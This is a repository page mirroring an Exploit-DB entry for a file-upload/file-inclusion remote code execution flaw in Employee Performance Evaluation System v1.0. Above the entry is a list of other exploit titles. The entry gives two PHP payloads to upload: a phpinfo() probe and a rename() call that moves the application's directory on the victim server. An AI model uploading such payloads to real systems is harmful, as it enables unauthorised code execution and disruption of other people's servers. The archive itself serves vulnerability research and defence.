bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51049.txt
Exploit-DB 79023d1f9c DB: 2023-03-26 
22 changes to exploits/shellcodes/ghdb

Password Manager for IIS v2.0 - XSS

DLink DIR 819 A1 - Denial of Service

D-Link DNR-322L <=2.60B15 - Authenticated Remote Code Execution

Abantecart v1.3.2 - Authenticated Remote Code Execution

Bus Pass Management System 1.0 - Cross-Site Scripting (XSS)

Composr-CMS Version <=10.0.39 - Authenticated Remote Code Execution

Employee Performance Evaluation System v1.0 - File Inclusion and RCE

GuppY CMS v6.00.10 - Remote Code Execution

Human Resources Management System v1.0 - Multiple SQLi

ImpressCMS v1.4.3 - Authenticated SQL Injection

Lavalite v9.0.0 - XSRF-TOKEN cookie File path traversal

MODX Revolution v2.8.3-pl - Authenticated Remote Code Execution

NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi

Online Diagnostic Lab Management System v1.0 - Remote Code Execution (RCE) (Unauthenticated)

PHPGurukul Online Birth Certificate System V 1.2 - Blind XSS

SimpleMachinesForum v2.1.1 - Authenticated Remote Code Execution

Translatepress Multilinugal WordPress plugin < 2.3.3 - Authenticated SQL Injection

Yoga Class Registration System v1.0 - Multiple SQLi

NVFLARE < 2.1.4 - Unsafe Deserialization due to Pickle

_camp_ Raspberry Pi camera server 1.0 -  Authentication Bypass

System Mechanic v15.5.0.61 - Arbitrary Read/Write
2023-03-26 00:16:30 +00:00

58 lines
No EOL
1.7 KiB
Text
Raw Blame History

## Exploit Title: Employee Performance Evaluation System v1.0 - File Inclusion and RCE
## Exploit Author: nu11secur1ty
## Date: 03.17.2023
## Vendor: https://www.sourcecodester.com/user/257130/activity
## Software: https://www.sourcecodester.com/php/14617/employee-performance-evaluation-system-phpmysqli-source-code.html
## Reference: https://brightsec.com/blog/file-inclusion-vulnerabilities/
## Description:
The Employee Performance Evaluation System-1.0 suffer from File
Inclusion - RCE Vulnerabilities.
The usual user of this system is allowed to submit a malicious file or
upload a malicious file to the server.
After then this user can execute remotely the already malicious
included file on the server of the victim. This can bring the system
to disaster or can destroy all information that is inside or this
information can be stolen.
STATUS: CRITICAL Vulnerability
[+]Get Info:
```PHP
<?php
// by nu11secur1ty - 2023
phpinfo();
?>
```
[+]Exploit:
```PHP
<?php
// by nu11secur1ty - 2023
// Old Name Of The file
$old_name = "C:/xampp7/htdocs/pwnedhost7/epes/" ;
// New Name For The File
$new_name = "C:/xampp7/htdocs/pwnedhost7/epes15/" ;
// using rename() function to rename the file
rename( $old_name, $new_name) ;
?>
```
## Proof Of Concept:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/upload/main/vendors/oretnom23/2023/Employee-Performance-Evaluation-1.0
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
Reference in a new issue View git blame Copy permalink